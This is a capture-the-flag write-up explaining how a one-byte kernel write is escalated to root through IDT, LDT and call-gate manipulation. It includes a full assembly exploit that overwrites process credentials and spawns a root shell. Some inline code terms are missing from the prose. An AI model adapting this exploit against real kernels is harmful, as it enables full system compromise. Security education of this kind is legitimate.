In this challenge, you could write one byte to an arbitrary kernel address (even those marked read-only, as long as it is not mapped as executable). This leads to a full compromise of the kernel, even without a KASLR leak.
KASLR is nice, but doesn’t apply everywhere. You can manipulate either the IDT (before the
0xfffffe0000000000) or LDT (after [
0xffff880000000000), which are mapped read-only at fixed addresses.
Writing to the GDT might also work, but usually there is a context switch after
challenge_write returns - and since
__switch_to triggers a GDT reload, the write is discarded.
i386 segments are a wonderful feature (“feature”) that are still around in x86_64 but not really used for everyday programming (
gs are still around, but work with MSRs now). However, many low-level mechanisms still use them to some extent (e.g. interrupts).
I’ll give a somewhat hand-wavy explanation here; for the actual full details you probably want to study a copy of the Intel SDM (Volume 3A) or AMD Programmer’s Manual (Volume 2). In essence: all of this is a gross oversimplification, so check the manual.
The segment registers
ss can hold a segment selector. When an instruction references memory through one of those segments, the CPU uses the segment information for additional permissions checks. Segments also have a base address by which each access through the segment is offset by. This was useful in the 16-bit era, when we might have had more memory than what a single 16-bit pointer could actually access. This is why pointers with additional segment information are also known as far pointers.
The CPU keeps the segment descriptors that contain all this information in one of two tables, the Global Descriptor Table (GDT) and the Local Descriptor Table (LDT). The GDT is generally CPU-wide (it holds segments like the kernel’s code and data segments, and the default userspace segments), while the LDT is process-configurable.
The descriptor itself contains information on the segment base and limit, and some additional flags including the descriptor’s privilege level (DPL). For example, for code segments this is the CPL at which the code is allowed to run (depending on some other flags).
The segment selector that is actually stored in the registers is really just an index into one of the corresponding descriptor tables. Bit 2 selects whether this is the (CPU-wide) GDT, or the (per-process) LDT. The low two bits indicate the selector’s privilege level (RPL - this is not the DPL of the actual segment descriptor, nor the current privilege level (CPL)).
Usually, this isn’t too interesting. However, there are also system-segment descriptors that have some additional features. Generally, these are used to support switching to higher privilege levels (e.g. when an interrupt occurs that needs to be handled by kernel code, even though the CPU is currently executing userspace instructions).
For this challenge, there are basically two important types:
Trap gates and/or interrupt gates in the IDT tell the CPU where it can find the interrupt handler for that specific interrupt (they differ only in whether they disable interrupts on entry).
Call gates in the LDT or GDT are very similar. Instead of being invoked by interrupts, they are invoked manually via a far
lcall in AT&T syntax).
Both of these types will - if set up correctly - switch the CPL to the DPL of the code segment that is referenced, and allow switching to CPL 0 this way.
If you run into SMAP troubles, you can easily disable SMAP by setting the
AC bit in the flags register before switching to CPL 0 - neither of these methods will modify this flag.
Since we know where the IDT is, we can move the interrupt entrypoint around by overwriting part of the address that will be called. If there is a useful gadget near the original entrypoint (that we can reach by changing only one byte), we can control where the kernel resumes execution. Normally, the
int 0x80 entrypoint is
entry_INT80_compat - but we can instead jump into the middle of an instruction to a
jmp rdi at
entry_INT80_compat+0x17 to transfer control back to a userspace address (remember: while SMAP is enabled, SMEP is disabled).
Another way to gain code execution is to set up a call gate in the LDT. Linux allows you to modify the LDT via the
modify_ldt syscall, but will filter out call gates. We can register a data segment descriptor with its base and limit set in such a way that if reinterpreted as a call gate, it will call back into our userspace code. Then, we use the one-byte write to set the type field of the descriptor to actually turn it into a call gate. A far call (rather than the
int 0x80) will then send execution into userspace code, but running at CPL 0.
At this point, the system is in a bit of a weird state. SMAP is disabled (see above), but we still don’t have full access to kernel code. Here are a few problems and how to fix them:
We nede to be able to access per-CPU variables via the
gs segment. For this, just use the
To leak a KASLR address, you can simply read the
LSTAR MSR (which contains the entry point for the
Kernel memory is not currently mapped because KPTI is enabled and we are still in the userspace page tables. To switch to the kernel-mode page tables, add 0x1000 to
cr3 (read the kernel code in
entry_64.S for more info).
The current page is most likely not mapped in the kernel page tables, so the previous step will fail. You can disable
cr0 and copy your shellcode to the hugepage that contains the syscall entrypoint.
Interrupts can cause chaos if they aren’t yet disabled, so use
cli to disable them
Then, do your usual kernel exploitation (e.g. setting
current->cred), and return to userspace (or not, I guess).
// gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn #include <linux/mman.h> #include <sys/syscall.h> .pushsection .text.1 .code64 __syscall_64_fail.L: negl %eax movl $SYS_exit_group, %eax syscall ud2 .popsection .macro check_syscall_64 nr:req, res=%rax movl \nr, %eax syscall test \res, \res js __syscall_64_fail.L .endm .macro var name:req .pushsection .data .balign 8 .local \name \name: .endm .macro endvar name:req .local end_\name end_\name: .eqv sizeof_\name, end_\name - \name .popsection .endm .macro asciz name:req, data:vararg var \name .asciz \data endvar \name .endm .macro far_ptr name:req, selector:req, offset:req var \name .int \offset .short \selector endvar \name .endm .macro fn name:req .text .code64 .global \name \name: .endm // <*/fcntl.h> are all C-only #define O_WRONLY 1 // Yes, ordering in kernel and user mode are different, blame AMD/Intel. #define __KERNEL_CS (2 * 8) // For 4-level paging #define LDT_BASE_ADDR 0xffff880000000000 #define LDT_STRIDE 0x10000 #define PTI_SWITCH_MASK 0x1000 // Arbitrary constants #define STACK_SIZE 0x80000 // Selectors for the LDT have bit 2 set. Also RPLs #define LDT_SELECTOR 0b100 #define RPL_KERNEL 0b000 #define RPL_USER 0b011 #define TARGET_ENTRY 12 #define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER) // With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset: // 0x0000000000401000 <- ring0 // 0x00000000ffdfffff // |||\___/ // ||| \____ limit // \/\_______ G, D, 0, AV // \________ base_addr[31:24] #define MSR_LSTAR 0xc0000082 #define KASLR_WRITABLE 0xa00000 #define KASLR_LSTAR 0xa00010 #define KASRL_WRITABLE_END 0xc00000 #define KASLR_WRITE_TO 0xbad000 #define KASLR_INIT_TASK 0x1613940 #define PERCPU_CURRENT 0x1fbc0 #define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78 #define STRUCT_TASK_STRUCT_CRED 0x0a80 #define STRUCT_CRED_USAGE 0x0 // TODO: Check that &ring0 == 0x401000 fn ring0 // Disable interrupts (interrupts cause double faults right now) cli // Read LSTAR to bypass KASLR movl $MSR_LSTAR, %ecx rdmsr shlq $32, %rdx orq %rax, %rdx subq $KASLR_LSTAR, %rdx movq %rdx, %rbp // Disable WP movq %cr0, %r8 andq $(~(1 << 16)), %r8 movq %r8, %cr0 // Copy stage 2 to the mapped kernel entry point movq %rbp, %rdi addq $KASLR_WRITE_TO, %rdi movq %rdi, %r15 leaq ring0_stage2(%rip), %rsi movl $sizeof_ring0_stage2, %ecx rep movsb // Jump there. jmp *%r15 var ring0_stage2 // Get access to per-cpu variables (current, mostly) via swapgs swapgs // Get the current page table. movq %cr3, %rbx // Switch to the kernel page table. andq $(~PTI_SWITCH_MASK), %rbx movq %rbx, %cr3 // Set current->cred and current->real_cred to init_task->cred addq $KASLR_INIT_TASK, %rdx movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx addl $2, STRUCT_CRED_USAGE(%rdx) movq %gs:PERCPU_CURRENT, %rax movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax) movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax) // Swap back swapgs // Switch the page table back around orq $PTI_SWITCH_MASK, %rbx movq %rbx, %cr3 // Build an `iret` stackframe rather than a `ret far` stack frame. popq %r8 // => %rip popq %r9 // => %cs pushfq orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti) pushq %r9 pushq %r8 iretq endvar ring0_stage2 var user_desc // base2 (base_addr[31:24]) == cs_offset[31:24] // limit_in_pages == cs_offset // seg_32bit == cs_offset // NB: Because lm is ignored, cs_offset must be 0 // useable == cs_offset // limit1 (limit[19:16]) == cs_offset[19:16] // flags0 == (arbitrary, will be overwritten later) // base1 (base_addr[23:16]) == (ignored entirely) // base0 (base_addr[15:0]) == __KERNEL_CS // limit0 (limit[15:0]) == cs_offset[15:0] .int TARGET_ENTRY // entry_number .int __KERNEL_CS // base_addr .int 0x01000 // limit .int 0b00000001 // flags (int because of padding - only the low byte is actually used) // |||||\/\____ .seg_32bit (D) (must be 1 for set_thread_area) // ||||| \_____ .contents (top 2 bits of type, must be 00 or 01 for set_thread_area) // ||||\_______ .read_exec_only (!R) // |||\________ .limit_in_pages (G) // ||\_________ .seg_not_present (!P) // |\__________ .useable (AV) // \___________ .lm (will be ignored) endvar user_desc // On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)). // We can't achieve this without another write, but here's what the values mean. // base2 (base_addr[31:24]) == (ignored) // flags1 == (ignored) // limit1 (limit[19:16]) == (ignored) // flags0 == (mostly ignored, except for the type) // base1 (base_addr[23:16]) == (ignored) // base0 (base_addr[15:0]) == cs_offset[63:48] // limit0 (limit[15:0]) == cs_offset[47:32] var high_desc // We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor // above the target descriptor). .int TARGET_ENTRY + 2 // entry_number .int 0xffff // base_addr .int 0xffff // limit .int 0b00111000 // flags endvar high_desc asciz module_path, "/dev/one_byte" asciz shell_path, "/bin/sh" var shell_argv .quad shell_path .quad 0 endvar shell_argv var module_message .quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5 .byte 0b11101100 endvar module_message .macro modify_ldt desc:req movl $sizeof_\desc, %edx leaq \desc(%rip), %rsi movl $0x11, %edi check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons. .endm fn _start // Open device xorl %edx, %edx movl $O_WRONLY, %esi leaq module_path(%rip), %rdi check_syscall_64 $SYS_open movl %eax, %r15d // "stac" in CPL3 pushfq orq $(1 << 18), (%rsp) popfq // Update the LDT modify_ldt user_desc modify_ldt high_desc // Trigger the overwrite movl $sizeof_module_message, %edx leaq module_message(%rip), %rsi movl %r15d, %edi check_syscall_64 $SYS_write // Go to CPL 0 far_ptr gate_target, TARGET_SELECTOR, 0xdead8664 lcall *(gate_target) // Get a shell leaq shell_path(%rip), %rdi leaq shell_argv(%rip), %rsi xorl %edx, %edx check_syscall_64 $SYS_execve exit_64 $0 // vim:syntax=asm: